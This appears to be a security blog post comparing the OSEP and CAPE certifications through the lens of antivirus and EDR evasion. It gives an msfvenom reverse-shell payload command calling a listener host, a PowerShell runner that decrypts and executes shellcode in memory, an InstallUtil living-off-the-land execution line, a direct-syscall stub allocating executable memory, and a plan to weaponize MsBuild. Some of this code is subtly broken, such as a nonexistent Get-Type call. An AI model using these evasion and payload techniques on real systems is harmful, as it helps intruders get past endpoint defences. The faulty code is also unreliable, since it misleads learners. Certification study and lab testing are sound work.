Listen to this Post

Introduction:
The landscape of advanced offensive security certifications is fiercely competitive, with Offensive Security’s Experienced Penetration Tester (OSEP) and Hack The Box’s Certified Adaptive Penetration Testing Expert (CAPE) standing as two elite benchmarks. A recent discussion sparked by a seasoned professional’s success highlights a critical, often undiscussed divide: the stark difference in defensive bypass requirements, specifically the presence or absence of Endpoint Detection and Response (EDR) systems. This revelation forces a reevaluation of how these exams prepare testers for the modern threat landscape, where EDR is ubiquitous.
Learning Objectives:
- Understand the technical and philosophical differences between the OSEP and CAPE certification exams.
- Master fundamental Antivirus (AV) bypass techniques applicable in environments without EDR.
- Learn the core concepts required to begin evading modern EDR solutions.
- Gain practical, actionable commands and code snippets for AV evasion and basic EDR bypass.
- Develop a roadmap for skill progression from AV to EDR evasion.
You Should Know:
- The Core Divergence: EDR as the Ultimate Exam Filter
The central argument posits that OSEP, while challenging, categorically excludes EDR bypass from its scope, making AV evasion “trivial” for experienced practitioners. Conversely, CAPE integrates EDR evasion, a factor contributing to its significantly lower pass rate and perceived difficulty. EDR solutions operate by monitoring system behavior, API calls, and memory for malicious activity, a layer far beyond signature-based AV.
Step‑by‑step guide explaining what this does and how to use it.
To understand the playing field, you must first be able to identify security products. On a compromised Windows host, use these commands to inventory defenses:
Windows - List security services and processes
wmic /namespace:\root\securitycenter2 path antivirusproduct get displayName, productState
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select displayName
Get-Process | Where-Object {$<em>.ProcessName -like "defend" -or $</em>.ProcessName -like "carbon" -or $<em>.ProcessName -like "sense" -or $</em>.ProcessName -like "crowd"}
Linux (for EDR agents) ps aux | grep -i -E '(sentinel|carbon|wazuh|osquery|falcon)' systemctl list-units --type=service | grep -i security
This reconnaissance is step zero. Knowing you’re facing only AV (likely Defender) versus a full EDR stack (like CrowdStrike, Microsoft Defender for Endpoint) dictates your entire attack chain.
- AV Bypass in an EDR-Less World: OSEP’s Playground
Without EDR, the primary obstacle is static and basic behavioral AV. Techniques focus on obfuscation, encryption, and living-off-the-land binaries (LOLBAS). The core methodology involves embedding shellcode in a non-malicious carrier (like a .NET assembly or PowerShell script) and using legitimate system functions to load and execute it in memory.
Step‑by‑step guide explaining what this does and how to use it.
A classic technique is using `PowerShell` to reflectively load a .NET assembly. First, generate an encrypted payload with a tool like `msfvenom` and embed it.
Generate encrypted shellcode (AES) msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f ps1 -o payload.ps1 This outputs a byte array. You would then wrap it in a decryption routine within a PowerShell script.
The PowerShell script (`runner.ps1`) would contain:
Example of a simplified, obfuscated runner
$key = [System.Text.Encoding]::UTF8.GetBytes('Your16ByteKey!!')
$encryptedBytes = [Byte[]] (@(0x1,0x2,...)) Your msfvenom bytes here
$AES = New-Object System.Security.Cryptography.AesManaged
$AES.Key = $key
$AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
$decryptor = $AES.CreateDecryptor()
$decryptedBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
Allocate memory and execute
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($decryptedBytes.Length)
[System.Runtime.InteropServices.Marshal]::Copy($decryptedBytes, 0, $mem, $decryptedBytes.Length)
$func = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mem, (Get-Type "System.Delegate"))
$func.Invoke()
Execution might involve further LOLBAS bypass: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U /S=runner.ps1`
3. Confronting EDR: CAPE’s Advanced Evasion Requirements
EDR evasion requires attacking the visibility stack itself. Key techniques include Direct/Indirect Syscalls (to avoid user-mode hooks placed by EDR in WinAPI functions), API unhooking, and sophisticated abuse of trusted, signed drivers. The goal is to execute malicious actions while generating telemetry that appears benign to the EDR sensor.
Step‑by‑step guide explaining what this does and how to use it.
Implementing direct syscalls in C/C++ is a foundational EDR bypass. Instead of calling `VirtualAlloc` via the imported Windows DLL (which is hooked), you call the system call (syscall) directly.
include <windows.h>
include <stdio.h>
// Manually define the syscall for NtAllocateVirtualMemory (x64 example)
unsigned char syscall_code[] = { 0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };
int main() {
HANDLE hProcess = GetCurrentProcess();
PVOID baseAddress = NULL;
SIZE_T regionSize = 0x1000;
// Create a function pointer to our syscall stub
void (NtAllocateVirtualMemory)(HANDLE, PVOID, ULONG_PTR, PSIZE_T, ULONG, ULONG);
NtAllocateVirtualMemory = (void)syscall_code;
// Call the syscall directly, bypassing any user-land hooks
NtAllocateVirtualMemory(hProcess, &baseAddress, 0, ®ionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (baseAddress) {
printf("Memory allocated at %p via direct syscall.\n", baseAddress);
}
return 0;
}
Compile this with x86_64-w64-mingw32-gcc -o syscall_test.exe syscall_test.c. This is a simplistic illustration; real-world use involves dynamically resolving syscall IDs (SSNs) to avoid static signatures.
- Beyond the Exam: Building a Real-World Evasion Toolkit
Passing an exam is one thing; operationalizing these skills requires a personal lab. You need a controlled environment to test EDR/AV bypass techniques, consisting of at least one Windows 10/11 endpoint with security tools installed and a monitoring station.
Step‑by‑step guide explaining what this does and how to use it.
Set up a basic detection lab using Microsoft Defender for Endpoint (MDE) in audit mode and Sysmon for detailed logging.
On Windows Endpoint (Admin PowerShell): Install Sysmon with a robust config (like SwiftOnSecurity's) Sysmon64.exe -accepteula -i sysmonconfig-export.xml Enable Defender logging for ASR rules Set-MpPreference -EnableNetworkProtection Enabled Use PowerShell to generate test events (e.g., suspicious process creation) Start-Process -NoNewWindow -FilePath "powershell.exe" -ArgumentList "-EncodedCommand <blob>"
Monitor from your attacking machine (Kali Linux) while also reviewing the Windows Event Logs (Eventvwr.msc) for IDs 1 (Process Creation), 3 (Network Connection), and 10 (Process Access) from Sysmon, and Defender logs. The key is to correlate your attack actions with the telemetry generated.
- From Certification to Career: What This Means for Your Skill Development
The OSEP vs. CAPE debate maps directly to career progression. OSEP solidifies advanced attack techniques in a semi-permissive environment. CAPE forces you to think like a blue teamer evading a sophisticated defender. The market increasingly values the latter.
Step‑by‑step guide explaining what this does and how to use it.
Build a continuous learning pipeline. After mastering OSEP-level AV bypass, methodically add EDR components.
1. Week 1-2: Deep dive into Windows Internals (Processes, Threads, Memory, Tokens). Use `WinDbg` for analysis.
2. Week 3-4: Practice manual direct syscall implementation for 5-10 critical APIs (NtAllocateVirtualMemory, NtCreateThreadEx, NtProtectVirtualMemory).
3. Week 5-6: Study and deploy open-source EDR hook detection/unhooking tools in your lab. Analyze their code.
4. Week 7+: Weaponize a LOLBAS tool like `MsBuild.exe` or `Register-CimProvider.exe` to load your unobfuscated, EDR-aware shellcode runner. Test against your lab’s EDR.
What Undercode Say:
- Certification Difficulty is Contextual: Labeling one exam “easier” than another is meaningless without the context of scope. OSEP’s defined lack of EDR makes it a different kind of challenge, focused on core penetration fluency, while CAPE tests cutting-edge evasion.
- The Real-World Gap is the EDR Layer: The professional community’s reaction validates that EDR evasion is the current high-water mark for offensive skills. An analyst who can only bypass AV is not prepared for a majority of enterprise environments, which have moved beyond simple AV.
The analysis suggests that OffSec may be intentionally keeping OSEP as a “foundational” advanced cert, ensuring a high pass rate for those who put in the lab work, while leaving the next evolution (possibly a new cert) to address EDR. Hack The Box, with its immersive platform, has positioned CAPE as the niche, next-step certification for specialists. This creates a clear, albeit demanding, pathway: eJPT -> OSCP -> OSEP -> CRTO/CAPE -> CRT. Ignoring the EDR component post-OSEP leaves a critical gap in a tester’s capability.
Prediction:
The public comparison of these exams will intensify the focus on EDR and anti-forensics in all future advanced offensive security certifications. Within two years, we predict Offensive Security will either heavily update OSEP’s scope to include basic EDR concepts or launch a new “OSED+” certification that directly bridges the gap between OSEP and the reported difficulty of CAPE. Furthermore, the proliferation of AI-assisted code analysis within EDR platforms will push the next generation of exams to include prompts for bypassing AI-driven heuristic detection, making the evasion landscape even more dynamic. Cloud-native attack paths and the associated Cloud Workload Protection Platforms (CWPP) will become the new “EDR bypass” challenge for the 2025-2026 certification cycle.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Takashi Suzuki – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


